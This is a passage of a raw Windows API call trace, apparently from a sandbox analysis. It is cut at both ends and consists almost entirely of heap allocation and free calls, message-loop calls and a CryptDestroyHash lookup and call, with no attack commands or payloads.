dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0245.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0245.790] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0245.790] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0245.790] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0245.790] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0245.790] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0245.790] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0245.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0245.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0245.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0245.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0245.791] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0245.791] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0245.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0245.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0245.791] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0245.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0245.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0245.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0245.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0245.791] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0245.792] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0245.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0245.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fc8 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0245.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0245.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0245.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0245.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0245.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0245.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51328 [0245.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0245.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0245.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0245.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0245.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0245.793] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0245.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514a8 [0245.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0245.793] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0245.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0245.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0245.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0245.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0245.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0245.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0245.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0245.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0245.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0245.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0245.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0245.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0245.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0245.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0245.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0245.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0245.794] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0245.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0245.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0245.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0245.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0245.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0245.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0245.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0245.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0245.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0245.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0245.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0245.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0245.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0245.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0245.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0245.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0245.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0245.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b48 [0245.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0245.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0245.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0245.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0245.795] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0245.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0245.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0245.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0245.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0245.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0245.795] CryptDestroyHash (hHash=0xa87050) returned 1 [0245.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0245.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0245.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0245.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0245.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0245.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0245.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0245.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0245.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0245.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0245.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0245.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0245.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0245.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0245.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0245.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0245.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0245.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0245.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0245.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree 